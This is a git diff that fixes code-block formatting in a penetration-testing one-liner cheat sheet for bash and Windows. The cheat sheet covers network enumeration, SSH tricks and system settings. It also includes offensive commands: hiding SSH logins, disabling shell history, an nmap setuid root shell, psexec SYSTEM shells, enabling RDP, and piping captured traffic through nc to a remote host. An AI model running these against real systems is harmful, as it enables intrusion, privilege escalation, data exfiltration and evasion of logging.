diff --git a/scripting/bash.md b/scripting/bash.md index 9560168..37dd3f3 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -5,76 +5,94 @@ One liners **Resolve a list of hostnames to IP addresses** ```bash -awk < hostnames.txt '{ system("resolveip -s " $1) }'``` +awk < hostnames.txt '{ system("resolveip -s " $1) }' +``` **IIS 6.0 IP Disclosure** ```bash -curl -l -O -H "Host:" "example.com"``` +curl -l -O -H "Host:" "example.com" +``` **Connect to SSL websites** ```bash -openssl s_client -connect example.com:443``` +openssl s_client -connect example.com:443 +``` **Convert base64 to text** ```bash -echo 'base64string' | base64 -d (Use -D on OSX)``` +echo 'base64string' | base64 -d (Use -D on OSX) +``` **Decode ASCII shellcode** ```bash -echo -e *shellcode hex string* (may need to use -i to ignore bad chars)``` +echo -e *shellcode hex string* (may need to use -i to ignore bad chars) +``` **Enumerate DNS of Class C** ```bash -for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done``` +for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done +``` **SSH to box and hide from "who" and "lastlog"** ```bash -ssh andrew@10.1.1.1 -T /bin/bash``` +ssh andrew@10.1.1.1 -T /bin/bash +``` **Prevent terminal logging** ```bash -unset HISTFILE``` +unset HISTFILE +``` **Add immutable attribute to a unix file** ```bash -chattr +i *file*``` +chattr +i *file* +``` **SSH into host2 through host1** ```bash -ssh -o "proxycommand ssh -W host2 host1" host2``` +ssh -o "proxycommand ssh -W host2 host1" host2 +``` **Nmap setuid privesc** ```bash nmap --script <(echo 'os.execute("/bin/sh")') -nmap --interactive (for older versions)``` +nmap --interactive (for older versions) +``` **Transfer files through SSH** ```bash -ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz``` +ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz +``` **Internal port redirect for bypassing services** ```bash -iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444``` +iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444 +``` **Enable forwarding on the fly** ```bash -sysctl -w net.ipv4.ip_forward=1``` +sysctl -w net.ipv4.ip_forward=1 +``` **Kill with USR1 developer defined signal** ```bash -kill -USR1 ``` +kill -USR1 +``` **Pull IP addresses from a file** ```bash -grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'``` +grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' +``` **Sniff traffic with tcpdump and send to remote tcp socket** ```bash -tcpdump -w - | nc -v 8.8.8.8 9999``` +tcpdump -w - | nc -v 8.8.8.8 9999 +``` **Recursively search for files within a directory** ```bash zcat -rf ./* | grep "searchstring" +``` Credits ----------- diff --git a/scripting/windows.md b/scripting/windows.md index 571e2c3..1d76902 100644 --- a/scripting/windows.md +++ b/scripting/windows.md @@ -5,12 +5,19 @@ One liners **Tunnel traffic natively with windows** ```bash netsh int portproxy v4tov4 listenport=80 connecthost=10.0.0.1 connectport=80 +``` **Launch cmd.exe as local system w/ psexec** +```bash psexec -s cmd.exe +``` **Enable rdp with CLI** +```bash reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +``` **Launch ARP scan** +```bash for /L %i in (1,1,255) do @start /b ping -n 1 -w 1 192.168.1.%i +``` \ No newline at end of file